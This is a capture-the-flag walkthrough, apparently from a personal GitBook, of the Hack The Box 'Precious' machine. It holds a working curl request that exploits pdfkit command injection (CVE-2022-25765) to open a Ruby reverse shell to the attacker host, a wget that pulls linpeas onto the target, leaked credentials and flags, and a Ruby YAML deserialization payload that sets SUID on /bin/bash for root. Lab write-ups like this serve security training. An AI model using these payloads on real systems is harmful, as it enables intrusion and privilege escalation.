> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/precious.md).

# Precious

<figure><img src="/files/Od8p3OGLDyd4nvsjQSNF" alt=""><figcaption></figcaption></figure>

##

## TARGET IP: 10.10.11.189

## HOST IP: 10.10.16.10

## Recon

### NMAP

```
nmap [Target IP]
```

<figure><img src="/files/HEALLkWjcUsgRQZGTjcK" alt=""><figcaption></figcaption></figure>

```
nmap -A -p 22,80 [Target IP]
```

<figure><img src="/files/JGZxX9lugB1zbmb8wYOq" alt=""><figcaption></figcaption></figure>

### HTTP

* First start by adding the URL to the associated target IP Address by adding it to the hosts file.

```
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts
```

<figure><img src="/files/0xzXygDg5xtcKeR7pMt0" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9gSm4Qnl9m7dUDg9JTtR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0m1NyF5obM6rTVx5USPn" alt=""><figcaption></figcaption></figure>

* I tried adding a URL to see what happens but it looks like it does not have web access to view page.
*

```
<figure><img src="/files/ODjrnnSM8V7xlAk8G45m" alt=""><figcaption></figcaption></figure>
```

* I tried <http://precious.htb/> and that still didn't work.
* ![](/files/cKxFjgESrjGoz16GxjVY)
* It does look like it will return credentials back depending on what you put in.

## Enumeration

### Gobuster

```
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/UxW1UwS92MzHN8W3U16E" alt=""><figcaption></figcaption></figure>

## Exploit

* It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
* Long story but I created different file extension payloads. It seems like the machine filters out `.php` and `.rb` file extensions and will make a pdf file of any other file type I load into it.
* I did this by starting up a python web server on my host machine and plugging the URL into the input box on the web server and opening up a netcat listener to see if I could get something to stick.&#x20;
* I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.

#### JAVA

* I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension `.xml`.

![](/files/buU1S8J8XT5XNe3YG8IN)

#### PDF

* I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.

```
exiftool [PDF File Path]
```

<figure><img src="/files/IqG3wMBjbBm57KZDfw1X" alt=""><figcaption></figcaption></figure>

* It looks like the Creator's name is `pdfkit V0.8.6`
* Let's go take a look at how I can possibly exploit this.

### CVE-2022-25765

* Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
* Set up a netcat listener

```
nc -lvnp 4444
```

* I found a tool on [`Github`](https://github.com/shamo0/PDFkit-CMD-Injection) that uses a curl command and forms a reverse shell that exploits the vulnerability.

{% code overflow="wrap" %}

```
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
```

{% endcode %}

* The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
*

```
<figure><img src="/files/RPJDteyb9MYlQ2HAPEH2" alt=""><figcaption></figcaption></figure>
```

* Let's get a more interactive shell to work with.

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
```

* On host machine, reopen the terminal and ignore the echo.

```
stty raw -echo; fg
```

![](/files/v2415qpUNAiUTxeSvKwu)

* Let's go look for the user flag.

```
find / -name user.txt 2>/dev/null
```

![](/files/uAEgwENpKKGZjUdscKs8)

* Looks like the file is unreadable due to permissions. Let's see what we can do about that.
* I now know we have at least 3 users on the system:
  * henry
  * ruby
  * root
* We can confirm this in the `/ect/passwd` file.

![](/files/V6n5K2sVzJJNrNJ3FCT7)

* I tired `sudo -l` but needed a password to use it. I also spent some time digging around to try find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.
* I used the same python web server I already had running.

```
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
```

![](/files/W0GMXfzbr96Y4bObPXd8)

* I wasn't getting anywhere there so I started browsing around a bit more. in the directory `/home/ruby/.bundle/config` I found some juicy info.

![](/files/wKUFgQLO0g8sGuKBkxiR)

* Looks like possible credentials for henry.

```
henry:Q3c1AqGHtoI0aXAYFH
```

* I'll now SSH into the machine with henry's credentials and it works.

```
ssh henry@[Target IP]
```

![](/files/mipHTccQKP0fHJUwAdfN)

* Now let's get that user file.

![](/files/8PgWdXMb0JiebqMhANlI)

```
0d534cd692f6860abfeb9af4ba3c4e92
```

* Next step is to see what priveleges I have as Henry.

```
sudo -l
```

![](/files/9lpzT24mPaZfHvbmdadQ)

* We have sudo privileges to run the `update/dependencies.rb` file. If we cat that file we can see that it calls back to a `dependencies.yml` file.

![](/files/sgJuF4QaF9UBgvwfaxS1)

```
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

```

* With this information, we should be able to craft a new `dependencies.yml` file with malicious code that it will call back to as sudo.
* In the `/home/henry` directory we will create a new `dependencies.yml` file and use this code snippet I got [online](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/).

```
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
```

* You'll notice that the `git_set` is set to `chmod +s /bin/bash`.
* This sets SUID to the that file which means we should be able to exploit it and escalate out privileges.
* In the same directory that you created the `dependencies.yml` file, run the following:

```
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

* This will execute file and end up changing the `/bin/bash` file privileges.
* After this is done, we can use a privilege escalation technique from [GTFOBins](https://gtfobins.github.io/gtfobins/bash/#suid) to escalate our privileges.

```
/bin/bash -p
```

* Check to see who are with `whoami` and you should now be root.

![](/files/CmD0hBJyLAoZrlMqBiF2)

```
cat /root/root.txt
```

![](/files/AHhudhThlxhdRMDeJWMq)

```
7090f28f7bc0ffc0a8b3203bd45ff6ac
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/precious.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
